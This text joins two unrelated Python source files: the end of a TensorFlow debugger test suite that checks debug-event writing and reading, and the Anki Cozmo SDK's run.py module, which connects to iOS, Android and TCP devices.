writer.WriteStackFrameWithId(stack_frame)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.source_file
for item in reader.source_files_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].file_path, "/home/tf2user/main.py")
self.assertEqual(actuals[i].host_name, "machine.cluster")
self.assertEqual(actuals[i].lines, ["print(%d)" % i])
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].id, "stack_%d" % i)
self.assertEqual(actuals[i].file_line_col.file_index, i * 10)
def testWriteGraphOpCreationAndDebuggedGraphs(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_op_creations = 10
for i in range(num_op_creations):
graph_op_creation = debug_event_pb2.GraphOpCreation()
graph_op_creation.op_type = "Conv2D"
graph_op_creation.op_name = "Conv2D_%d" % i
writer.WriteGraphOpCreation(graph_op_creation)
debugged_graph = debug_event_pb2.DebuggedGraph()
debugged_graph.graph_id = "deadbeaf"
debugged_graph.graph_name = "MyGraph1"
writer.WriteDebuggedGraph(debugged_graph)
writer.FlushNonExecutionFiles()
reader = debug_events_reader.DebugEventsReader(self.dump_root)
actuals = list(item.debug_event for item in reader.graphs_iterator())
self.assertLen(actuals, num_op_creations + 1)
for i in range(num_op_creations):
self.assertEqual(actuals[i].graph_op_creation.op_type, "Conv2D")
self.assertEqual(actuals[i].graph_op_creation.op_name, "Conv2D_%d" % i)
self.assertEqual(actuals[num_op_creations].debugged_graph.graph_id,
"deadbeaf")
def testConcurrentWritesToNonExecutionFilesWorks(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
source_file_state = {"counter": 0, "lock": threading.Lock()}
def writer_source_file():
source_file = debug_event_pb2.SourceFile()
with source_file_state["lock"]:
source_file.file_path = "/home/tf2user/file_%d.py" % source_file_state[
"counter"]
source_file_state["counter"] += 1
writer.WriteSourceFile(source_file)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
stack_frame_state = {"counter": 0, "lock": threading.Lock()}
def write_stack_frame():
stack_frame = debug_event_pb2.StackFrameWithId()
with stack_frame_state["lock"]:
stack_frame.id = "stack_frame_%d" % stack_frame_state["counter"]
stack_frame_state["counter"] += 1
writer.WriteStackFrameWithId(stack_frame)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
graph_op_state = {"counter": 0, "lock": threading.Lock()}
def write_graph_op_creation():
graph_op_creation = debug_event_pb2.GraphOpCreation()
with graph_op_state["lock"]:
graph_op_creation.op_name = "Op%d" % graph_op_state["counter"]
graph_op_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
# More-frequent-than-necessary concurrent flushing is not recommended,
# but tolerated.
writer.FlushNonExecutionFiles()
num_threads = 9
threads = []
for i in range(num_threads):
if i % 3 == 0:
target = writer_source_file
elif i % 3 == 1:
target = write_stack_frame
else:
target = write_graph_op_creation
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify the content of the .source_files file.
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
source_files_iter = reader.source_files_iterator()
actuals = list(item.debug_event.source_file for item in source_files_iter)
file_paths = sorted([actual.file_path for actual in actuals])
self.assertEqual(file_paths, [
"/home/tf2user/file_0.py", "/home/tf2user/file_1.py",
"/home/tf2user/file_2.py"
])
# Verify the content of the .stack_frames file.
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
stack_frame_ids = sorted([actual.id for actual in actuals])
self.assertEqual(stack_frame_ids,
["stack_frame_0", "stack_frame_1", "stack_frame_2"])
# Verify the content of the .graphs file.
actuals = list(item.debug_event.graph_op_creation
for item in reader.graphs_iterator())
graph_op_names = sorted([actual.op_name for actual in actuals])
self.assertEqual(graph_op_names, ["Op0", "Op1", "Op2"])
def testWriteAndReadMetadata(self):
t0 = time.time()
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
writer.Close()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
self.assertIsInstance(reader.starting_wall_time(), float)
self.assertGreaterEqual(reader.starting_wall_time(), t0)
self.assertEqual(reader.tensorflow_version(), versions.__version__)
def testWriteExecutionEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
reader.update()
self.assertFalse(reader.executions())
writer.FlushExecutionFiles()
reader.update()
executions = reader.executions()
for i, execution in enumerate(executions):
self.assertEqual(
execution.op_type,
"OpType%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteExecutionEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, num_execution_events)
for i, execution in enumerate(executions):
self.assertEqual(execution.op_type, "OpType%d" % i)
def testWriteGraphExecutionTraceEventsWithCircularBuffer(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(reader.graph_execution_traces_iterator())
# Before FlushExecutionFiles() is called. No data should have been written
# to the file.
self.assertEqual(len(actuals), 0)
writer.FlushExecutionFiles()
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE)
for i in range(debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE):
self.assertEqual(
actuals[i].op_name,
"Op%d" % (i + debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE))
def testWriteGraphExecutionTraceEventsWithoutCircularBufferBehavior(self):
# A circular buffer size of 0 abolishes the circular buffer behavior.
writer = debug_events_writer.DebugEventsWriter(self.dump_root, 0)
num_execution_events = debug_events_writer.DEFAULT_CIRCULAR_BUFFER_SIZE * 2
for i in range(num_execution_events):
trace = debug_event_pb2.GraphExecutionTrace()
trace.op_name = "Op%d" % i
writer.WriteGraphExecutionTrace(trace)
writer.FlushExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.graph_execution_trace
for item in reader.graph_execution_traces_iterator())
self.assertLen(actuals, num_execution_events)
for i in range(num_execution_events):
self.assertEqual(actuals[i].op_name, "Op%d" % i)
def testConcurrentWritesToExecutionFiles(self):
circular_buffer_size = 5
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
execution_state = {"counter": 0, "lock": threading.Lock()}
def write_execution():
execution = debug_event_pb2.Execution()
with execution_state["lock"]:
execution.op_type = "OpType%d" % execution_state["counter"]
execution_state["counter"] += 1
writer.WriteExecution(execution)
graph_execution_trace_state = {"counter": 0, "lock": threading.Lock()}
def write_graph_execution_trace():
with graph_execution_trace_state["lock"]:
op_name = "Op%d" % graph_execution_trace_state["counter"]
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
graph_execution_trace_state["counter"] += 1
writer.WriteGraphOpCreation(graph_op_creation)
writer.WriteGraphExecutionTrace(trace)
threads = []
for i in range(circular_buffer_size * 4):
if i % 2 == 0:
target = write_execution
else:
target = write_graph_execution_trace
thread = threading.Thread(target=target)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
# Verify the content of the .execution file.
executions = reader.executions()
executed_op_types = [execution.op_type for execution in executions]
self.assertLen(executed_op_types, circular_buffer_size)
self.assertLen(executed_op_types, len(set(executed_op_types)))
# Verify the content of the .graph_execution_traces file.
op_names = [trace.op_name for trace in reader.graph_execution_traces()]
self.assertLen(op_names, circular_buffer_size)
self.assertLen(op_names, len(set(op_names)))
def testConcurrentSourceFileRandomReads(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
for i in range(100):
source_file = debug_event_pb2.SourceFile(
host_name="localhost", file_path="/tmp/file_%d.py" % i)
source_file.lines.append("# File %d" % i)
writer.WriteSourceFile(source_file)
writer.FlushNonExecutionFiles()
reader = debug_events_reader.DebugDataReader(self.dump_root)
reader.update()
lines = [None] * 100
def read_job_1():
# Read in the reverse order to enhance randomness of the read access.
for i in range(49, -1, -1):
lines[i] = reader.source_lines("localhost", "/tmp/file_%d.py" % i)
def read_job_2():
for i in range(99, 49, -1):
lines[i] = reader.source_lines("localhost", "/tmp/file_%d.py" % i)
thread_1 = threading.Thread(target=read_job_1)
thread_2 = threading.Thread(target=read_job_2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
for i in range(100):
self.assertEqual(lines[i], ["# File %d" % i])
def testConcurrentExecutionUpdateAndRandomRead(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
writer_state = {"counter": 0, "done": False}
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
def write_and_update_job():
while True:
if writer_state["done"]:
break
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % writer_state["counter"]
writer_state["counter"] += 1
writer.WriteExecution(execution)
writer.FlushExecutionFiles()
reader.update()
# On the sub-thread, keep writing and reading new Execution protos.
write_and_update_thread = threading.Thread(target=write_and_update_job)
write_and_update_thread.start()
# On the main thread, do concurrent random read.
while True:
exec_digests = reader.executions(digest=True)
if exec_digests:
exec_0 = reader.read_execution(exec_digests[0])
self.assertEqual(exec_0.op_type, "OpType0")
writer_state["done"] = True
break
else:
time.sleep(0.1)
continue
write_and_update_thread.join()
def testConcurrentExecutionRandomReads(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
for i in range(100):
execution = debug_event_pb2.Execution()
execution.op_type = "OpType%d" % i
writer.WriteExecution(execution)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
reader = debug_events_reader.DebugDataReader(self.dump_root)
reader.update()
executions = [None] * 100
def read_job_1():
execution_digests = reader.executions(digest=True)
# Read in the reverse order to enhance randomness of the read access.
for i in range(49, -1, -1):
execution = reader.read_execution(execution_digests[i])
executions[i] = execution
def read_job_2():
execution_digests = reader.executions(digest=True)
for i in range(99, 49, -1):
execution = reader.read_execution(execution_digests[i])
executions[i] = execution
thread_1 = threading.Thread(target=read_job_1)
thread_2 = threading.Thread(target=read_job_2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
for i in range(100):
self.assertEqual(executions[i].op_type, "OpType%d" % i)
def testConcurrentGraphExecutionTraceUpdateAndRandomRead(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
writer_state = {"counter": 0, "done": False}
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
def write_and_update_job():
while True:
if writer_state["done"]:
break
op_name = "Op%d" % writer_state["counter"]
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
writer.WriteGraphOpCreation(graph_op_creation)
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
writer.WriteGraphExecutionTrace(trace)
writer_state["counter"] += 1
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
reader.update()
# On the sub-thread, keep writing and reading new GraphExecutionTraces.
write_and_update_thread = threading.Thread(target=write_and_update_job)
write_and_update_thread.start()
# On the main thread, do concurrent random read.
while True:
digests = reader.graph_execution_traces(digest=True)
if digests:
trace_0 = reader.read_graph_execution_trace(digests[0])
self.assertEqual(trace_0.op_name, "Op0")
writer_state["done"] = True
break
else:
time.sleep(0.1)
continue
write_and_update_thread.join()
def testConcurrentGraphExecutionTraceRandomReads(self):
circular_buffer_size = -1
writer = debug_events_writer.DebugEventsWriter(self.dump_root,
circular_buffer_size)
debugged_graph = debug_event_pb2.DebuggedGraph(graph_id="graph1",
graph_name="graph1")
writer.WriteDebuggedGraph(debugged_graph)
for i in range(100):
op_name = "Op%d" % i
graph_op_creation = debug_event_pb2.GraphOpCreation(
op_type="FooOp", op_name=op_name, graph_id="graph1")
writer.WriteGraphOpCreation(graph_op_creation)
trace = debug_event_pb2.GraphExecutionTrace(
op_name=op_name, tfdbg_context_id="graph1")
writer.WriteGraphExecutionTrace(trace)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
reader = debug_events_reader.DebugDataReader(self.dump_root)
reader.update()
traces = [None] * 100
def read_job_1():
digests = reader.graph_execution_traces(digest=True)
for i in range(49, -1, -1):
traces[i] = reader.read_graph_execution_trace(digests[i])
def read_job_2():
digests = reader.graph_execution_traces(digest=True)
for i in range(99, 49, -1):
traces[i] = reader.read_graph_execution_trace(digests[i])
thread_1 = threading.Thread(target=read_job_1)
thread_2 = threading.Thread(target=read_job_2)
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
for i in range(100):
self.assertEqual(traces[i].op_name, "Op%d" % i)
class DataObjectsTest(test_util.TensorFlowTestCase):
def jsonRoundTripCheck(self, obj):
self.assertEqual(
json_lib.dumps(json_lib.loads(json_lib.dumps(obj)), sort_keys=True),
json_lib.dumps(obj, sort_keys=True))
def testExecutionDigestWithNoOutputToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=None)
json = execution_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], None)
def testExecutionDigestWithTwoOutputsToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=[1357, 2468])
json = execution_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], (1357, 2468))
def testExecutionNoGraphNoInputToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=[1357])
execution = debug_events_reader.Execution(
execution_digest,
"localhost",
("a1", "b2"),
debug_event_pb2.TensorDebugMode.CURT_HEALTH,
graph_id=None,
input_tensor_ids=None,
output_tensor_ids=[2468],
debug_tensor_values=([1, 0],))
json = execution.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], (1357,))
self.assertEqual(json["host_name"], "localhost")
self.assertEqual(json["stack_frame_ids"], ("a1", "b2"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.CURT_HEALTH)
self.assertIsNone(json["graph_id"])
self.assertIsNone(json["input_tensor_ids"])
self.assertEqual(json["output_tensor_ids"], (2468,))
self.assertEqual(json["debug_tensor_values"], ([1, 0],))
  def testExecutionWithGraphAndInputsButNoOutputToJson(self):
execution_digest = debug_events_reader.ExecutionDigest(
1234, 5678, "FooOp", output_tensor_device_ids=[1357])
execution = debug_events_reader.Execution(
execution_digest,
"localhost",
("a1", "b2"),
debug_event_pb2.TensorDebugMode.FULL_HEALTH,
graph_id="abcd",
input_tensor_ids=[13, 37],
output_tensor_ids=None,
debug_tensor_values=None)
json = execution.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["output_tensor_device_ids"], (1357,))
self.assertEqual(json["host_name"], "localhost")
self.assertEqual(json["stack_frame_ids"], ("a1", "b2"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.FULL_HEALTH)
self.assertEqual(json["graph_id"], "abcd")
self.assertEqual(json["input_tensor_ids"], (13, 37))
self.assertIsNone(json["output_tensor_ids"])
self.assertIsNone(json["debug_tensor_values"])
def testGraphOpCreationDigestNoInputNoDeviceNameToJson(self):
op_creation_digest = debug_events_reader.GraphOpCreationDigest(
1234, 5678, "deadbeef", "FooOp", "Model_1/Foo_2",
[135], input_names=None, device_name=None)
json = op_creation_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_tensor_ids"], (135,))
self.assertIsNone(json["input_names"])
self.assertIsNone(json["device_name"])
def testGraphOpCreationDigestWithInputsAndDeviceNameToJson(self):
op_creation_digest = debug_events_reader.GraphOpCreationDigest(
1234, 5678, "deadbeef", "FooOp", "Model_1/Foo_2",
[135], input_names=["Bar_1", "Qux_2"], device_name="/device:GPU:0")
json = op_creation_digest.to_json()
self.jsonRoundTripCheck(json)
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_tensor_ids"], (135,))
self.assertEqual(json["input_names"], ("Bar_1", "Qux_2"))
self.assertEqual(json["device_name"], "/device:GPU:0")
def testGraphExecutionTraceDigestToJson(self):
trace_digest = debug_events_reader.GraphExecutionTraceDigest(
1234, 5678, "FooOp", "Model_1/Foo_2", 1, "deadbeef")
json = trace_digest.to_json()
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_slot"], 1)
self.assertEqual(json["graph_id"], "deadbeef")
def testGraphExecutionTraceWithTensorDebugValueAndDeviceNameToJson(self):
trace_digest = debug_events_reader.GraphExecutionTraceDigest(
1234, 5678, "FooOp", "Model_1/Foo_2", 1, "deadbeef")
trace = debug_events_reader.GraphExecutionTrace(
trace_digest, ["g1", "g2", "deadbeef"],
debug_event_pb2.TensorDebugMode.CURT_HEALTH,
debug_tensor_value=[3, 1], device_name="/device:GPU:0")
json = trace.to_json()
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_slot"], 1)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["graph_ids"], ("g1", "g2", "deadbeef"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.CURT_HEALTH)
self.assertEqual(json["debug_tensor_value"], (3, 1))
self.assertEqual(json["device_name"], "/device:GPU:0")
def testGraphExecutionTraceNoTensorDebugValueNoDeviceNameToJson(self):
trace_digest = debug_events_reader.GraphExecutionTraceDigest(
1234, 5678, "FooOp", "Model_1/Foo_2", 1, "deadbeef")
trace = debug_events_reader.GraphExecutionTrace(
trace_digest, ["g1", "g2", "deadbeef"],
debug_event_pb2.TensorDebugMode.NO_TENSOR,
debug_tensor_value=None, device_name=None)
json = trace.to_json()
self.assertEqual(json["wall_time"], 1234)
self.assertEqual(json["op_type"], "FooOp")
self.assertEqual(json["op_name"], "Model_1/Foo_2")
self.assertEqual(json["output_slot"], 1)
self.assertEqual(json["graph_id"], "deadbeef")
self.assertEqual(json["graph_ids"], ("g1", "g2", "deadbeef"))
self.assertEqual(json["tensor_debug_mode"],
debug_event_pb2.TensorDebugMode.NO_TENSOR)
self.assertIsNone(json["debug_tensor_value"])
self.assertIsNone(json["device_name"])
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
run.py
|
# Copyright (c) 2016-2017 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''The run module contains helper classes and functions for opening a connection to the engine.
To get started, the :func:`run_program` function can be used for most cases,
it handles connecting to a device and then running the function you provide with
the SDK-provided Robot object passed in.
The :func:`connect` function can be used to open a connection
and run your own code connected to a :class:`cozmo.conn.CozmoConnection`
instance. It takes care of setting up an event loop, finding the Android or
iOS device running the Cozmo app and making sure the connection is ok.
You can also use the :func:`connect_with_tkviewer` or :func:`connect_with_3dviewer`
functions, which work in a similar way to :func:`connect` but will also display
a window on the screen showing a view from Cozmo's camera (using Tk), or
a 3D viewer (with an optional second window showing Cozmo's camera, using
OpenGL), if supported on your system.
Finally, more advanced programs can integrate the SDK with an existing event
loop by using the :func:`connect_on_loop` function.
All of these functions make use of a :class:`DeviceConnector` subclass to
deal with actually connecting to an Android or iOS device. There shouldn't
normally be a need to modify them or write your own.
'''
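# A minimal usage sketch (illustrative only, kept as a comment so the module
# body is unchanged; `my_program` is a hypothetical user function):
#
#   import cozmo
#
#   def my_program(robot: cozmo.robot.Robot):
#       robot.say_text("Hello").wait_for_completed()
#
#   cozmo.run_program(my_program)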
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['DeviceConnector', 'IOSConnector', 'AndroidConnector', 'TCPConnector',
'connect', 'connect_with_3dviewer', 'connect_with_tkviewer', 'connect_on_loop',
'run_program', 'setup_basic_logging']
import threading
import asyncio
import concurrent.futures
import functools
import inspect
import logging
import os
import os.path
import queue
import shutil
import subprocess
import sys
import types
import warnings
from . import logger, logger_protocol
from . import base
from . import clad_protocol
from . import conn
from . import event
from . import exceptions
from . import usbmux
#: The TCP port number we expect the Cozmo app to be listening on.
COZMO_PORT = 5106
if sys.platform in ('win32', 'cygwin'):
DEFAULT_ADB_CMD = 'adb.exe'
else:
DEFAULT_ADB_CMD = 'adb'
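# _observe_connection_lost wraps a protocol's connection_lost method with a
# types.MethodType shim so that an extra callback fires when the transport
# drops; the connectors below use it to evict devices from their `_connected`
# sets on disconnect.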
def _observe_connection_lost(proto, cb):
meth = proto.connection_lost
@functools.wraps(meth)
def connection_lost(self, exc):
meth(exc)
cb()
proto.connection_lost = types.MethodType(connection_lost, proto)
class DeviceConnector:
'''Base class for objects that setup the physical connection to a device.'''
def __init__(self, cozmo_port=COZMO_PORT, enable_env_vars=True):
self.cozmo_port = cozmo_port
if enable_env_vars:
self.parse_env_vars()
async def connect(self, loop, protocol_factory, conn_check):
'''Connect attempts to open a connection transport to the Cozmo app on a device.
On opening a transport it will create a protocol from the supplied
factory and connect it to the transport, returning a (transport, protocol)
tuple. See :meth:`asyncio.BaseEventLoop.create_connection`
'''
raise NotImplementedError
def parse_env_vars(self):
try:
self.cozmo_port = int(os.environ['COZMO_PORT'])
except (KeyError, ValueError):
pass
class IOSConnector(DeviceConnector):
'''Connects to an attached iOS device over USB.
Opens a connection to the first iOS device that's found to be running
the Cozmo app in SDK mode.
iTunes (or another service providing usbmuxd) must be installed in order
for this connector to be able to open a connection to a device.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available iOS device running
the Cozmo app in SDK mode.
'''
def __init__(self, serial=None, **kw):
super().__init__(**kw)
self.usbmux = None
self._connected = set()
self.serial = serial
async def connect(self, loop, protocol_factory, conn_check):
if not self.usbmux:
self.usbmux = await usbmux.connect_to_usbmux(loop=loop)
try:
if self.serial is None:
device_info, transport, proto = await self.usbmux.connect_to_first_device(
protocol_factory, self.cozmo_port, exclude=self._connected)
else:
device_id = await self.usbmux.wait_for_serial(self.serial)
device_info, transport, proto = await self.usbmux.connect_to_device(
protocol_factory, device_id, self.cozmo_port)
except asyncio.TimeoutError as exc:
raise exceptions.ConnectionError("No connected iOS devices running Cozmo in SDK mode") from exc
device_id = device_info.get('DeviceID')
proto.device_info={
'device_type': 'ios',
'device_id': device_id,
'serial': device_info.get('SerialNumber')
}
if conn_check is not None:
await conn_check(proto)
self._connected.add(device_id)
logger.info('Connected to iOS device_id=%s serial=%s', device_id,
device_info.get('SerialNumber'))
_observe_connection_lost(proto, functools.partial(self._disconnect, device_id))
return transport, proto
def _disconnect(self, device_id):
logger.info('iOS device_id=%s disconnected.', device_id)
self._connected.discard(device_id)
class AndroidConnector(DeviceConnector):
'''Connects to an attached Android device over USB.
This requires the Android Studio command line tools to be installed,
specifically `adb`.
By default the connector will attempt to locate `adb` (or `adb.exe`
on Windows) in common locations, but it may also be supplied by setting
the ``ANDROID_ADB_PATH`` environment variable, or by passing it
to the constructor.
An instance of this class can be passed to the ``connect_`` prefixed
functions in this module.
Args:
serial (string): Serial number of the device to connect to.
If None, then connect to the first available Android device running
the Cozmo app in SDK mode.
'''
def __init__(self, adb_cmd=None, serial=None, **kw):
self._adb_cmd = None
super().__init__(**kw)
self.serial = serial
self.portspec = 'tcp:' + str(self.cozmo_port)
self._connected = set()
        if adb_cmd:
            self._adb_cmd = adb_cmd
        elif self._adb_cmd is None:
            # Only fall back to a PATH lookup when neither the constructor
            # argument nor the ANDROID_ADB_PATH environment variable set it,
            # as the docstring above promises.
            self._adb_cmd = shutil.which(DEFAULT_ADB_CMD)
def parse_env_vars(self):
super().parse_env_vars()
self._adb_cmd = os.environ.get('ANDROID_ADB_PATH')
@property
def adb_cmd(self):
if self._adb_cmd is not None:
return self._adb_cmd
if sys.platform != 'win32':
return DEFAULT_ADB_CMD
# C:\Users\IEUser\AppData\Local\Android\android-sdk
# C:\Program Files (x86)\Android\android-sdk
try_paths = []
for path in [os.environ[key] for key in ('LOCALAPPDATA', 'ProgramFiles', 'ProgramFiles(x86)') if key in os.environ]:
try_paths.append(os.path.join(path, 'Android', 'android-sdk'))
for path in try_paths:
adb_path = os.path.join(path, 'platform-tools', 'adb.exe')
if os.path.exists(adb_path):
self._adb_cmd = adb_path
logger.debug('Found adb.exe at %s', adb_path)
return adb_path
raise ValueError('Could not find Android development tools')
def _exec(self, *args):
try:
result = subprocess.run([self.adb_cmd] + list(args),
stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=5)
except Exception as e:
raise ValueError('Failed to execute adb command %s: %s' % (self.adb_cmd, e))
if result.returncode != 0:
raise ValueError('Failed to execute adb command %s: %s' % (result.args, result.stderr))
return result.stdout.split(b'\n')
def _devices(self):
for line in self._exec('devices'):
line = line.split()
if len(line) != 2 or line[1] != b'device':
continue
yield line[0].decode('ascii') # device serial #
def _add_forward(self, serial):
self._exec('-s', serial, 'forward', self.portspec, self.portspec)
def _remove_forward(self, serial):
self._exec('-s', serial, 'forward', '--remove', self.portspec)
async def connect(self, loop, protocol_factory, conn_check):
version_mismatch = None
for serial in self._devices():
if serial in self._connected:
continue
if self.serial is not None and serial.lower() != self.serial.lower():
continue
logger.debug('Checking connection to Android device: %s', serial)
try:
self._remove_forward(serial)
except:
pass
self._add_forward(serial)
try:
transport, proto = await loop.create_connection(
protocol_factory, '127.0.0.1', self.cozmo_port)
proto.device_info={
'device_type': 'android',
'serial': serial,
}
if conn_check:
# Check that we have a good connection before returning
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info('Connected to Android device serial=%s', serial)
self._connected.add(serial)
_observe_connection_lost(proto, functools.partial(self._disconnect, serial))
return transport, proto
except exceptions.SDKVersionMismatch as e:
version_mismatch = e
except:
pass
self._remove_forward(serial)
if version_mismatch is not None:
raise version_mismatch
raise exceptions.ConnectionError("No connected Android devices running Cozmo in SDK mode")
def _disconnect(self, serial):
logger.info('Android serial=%s disconnected.', serial)
self._connected.discard(serial)
class TCPConnector(DeviceConnector):
'''Connects to the Cozmo app directly via TCP.
Generally only used for testing and debugging.
Requires that a SDK_TCP_PORT environment variable be set to the port
number to connect to.
'''
def __init__(self, tcp_port=None, ip_addr='127.0.0.1', **kw):
super().__init__(**kw)
self.ip_addr = ip_addr
if tcp_port is not None:
# override SDK_TCP_PORT environment variable
self.tcp_port = tcp_port
def parse_env_vars(self):
super().parse_env_vars()
self.tcp_port = None
try:
self.tcp_port = int(os.environ['SDK_TCP_PORT'])
except (KeyError, ValueError):
pass
@property
def enabled(self):
return self.tcp_port is not None
async def connect(self, loop, protocol_factory, conn_check):
transport, proto = await loop.create_connection(protocol_factory, self.ip_addr, self.tcp_port)
proto.device_info={
'device_type': 'tcp',
'host': '%s:%s' % (self.ip_addr, self.tcp_port),
}
if conn_check:
try:
await conn_check(proto)
except Exception as e:
logger.debug('Failed connection check: %s', e)
raise
logger.info("Connected to device on TCP port %d" % self.tcp_port)
return transport, proto
